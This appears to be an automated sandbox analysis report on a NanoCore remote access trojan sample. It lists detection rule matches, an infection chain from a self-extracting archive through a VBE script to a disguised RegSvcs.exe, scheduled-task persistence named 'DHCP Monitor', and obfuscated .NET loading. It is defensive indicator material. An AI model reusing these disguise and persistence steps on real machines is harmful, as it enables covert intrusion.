Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002BF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 7_2_002BF122
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: String function: 0096EB78 appears 39 times
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: String function: 0096EC50 appears 56 times
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: String function: 0096F5F0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: String function: 0026FD60 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: String function: 00270DC0 appears 46 times
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_00956FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 0_2_00956FAA
Source: P05jmXYKpr.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@30/36@16/2
Source: C:\Users\user\Desktop\P05jmXYKpr.exe File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_00956C74 GetLastError,FormatMessageW, 0_2_00956C74
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0096A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_0096A6C2
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File created: C:\Program Files (x86)\DHCP Monitor
Source: P05jmXYKpr.exe ReversingLabs: Detection: 70%
Source: P05jmXYKpr.exe Virustotal: Detection: 68%
Source: C:\Users\user\Desktop\P05jmXYKpr.exe File read: C:\Users\user\Desktop\P05jmXYKpr.exe
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\P05jmXYKpr.exe C:\Users\user\Desktop\P05jmXYKpr.exe
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Update-ta.l.vbe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c boaliim.dat ikvvfncnn.bmp
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat boaliim.dat ikvvfncnn.bmp
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpE45C.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpE586.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Update-ta.l.vbe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c boaliim.dat ikvvfncnn.bmp
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat boaliim.dat ikvvfncnn.bmp
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpE45C.tmp
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpE586.tmp
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002B194F AdjustTokenPrivileges,CloseHandle, 7_2_002B194F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002B1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 7_2_002B1F53
Source: C:\Users\user\Desktop\P05jmXYKpr.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002D4089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 7_2_002D4089
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002C5B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 7_2_002C5B27
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002BDC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification, 7_2_002BDC9C
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{72ec1ea3-16bf-4e76-a7cf-15ed5e2a0279}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_01
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Command line argument: sfxname 0_2_0096DF1E
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Command line argument: sfxstime 0_2_0096DF1E
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Command line argument: STARTDLG 0_2_0096DF1E
Source: C:\Users\user\Desktop\P05jmXYKpr.exe File written: C:\Users\user\AppData\Local\Temp\RarSFX0\nibh.ini
Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'CreateDecryptor'
Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'TransformFinalBlock'
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: P05jmXYKpr.exe Static file information: File size 1115860 > 1048576
Source: P05jmXYKpr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: P05jmXYKpr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: P05jmXYKpr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: P05jmXYKpr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: P05jmXYKpr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: P05jmXYKpr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: P05jmXYKpr.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: P05jmXYKpr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: P05jmXYKpr.exe
Source: Binary string: \??\C:\Windows\dll\System.pdb source: RegSvcs.exe, 0000000D.00000003.467685686.0000000001C53000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000D.00000000.419225570.0000000000D22000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe.7.dr, dhcpmon.exe.13.dr
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdbj source: RegSvcs.exe, 0000000D.00000003.482399735.0000000001C53000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000003.467685686.0000000001C53000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000D.00000000.419225570.0000000000D22000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe, 0000000D.00000002.634072543.0000000001BEA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe.7.dr, dhcpmon.exe.13.dr
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source: P05jmXYKpr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: P05jmXYKpr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: P05jmXYKpr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: P05jmXYKpr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: P05jmXYKpr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0096F640 push ecx; ret 0_2_0096F653
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0096EB78 push eax; ret 0_2_0096EB96
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002A0332 push edi; ret 7_2_002A0333
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_00270E06 push ecx; ret 7_2_00270E19
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_0026DBFE push eax; iretd 7_2_0026DC01
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_0026DBFC push cs; iretd 7_2_0026DBFD
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_00255D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 7_2_00255D78
Source: P05jmXYKpr.exe Static PE information: section name: .didat
Source: C:\Users\user\Desktop\P05jmXYKpr.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_5537109
Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
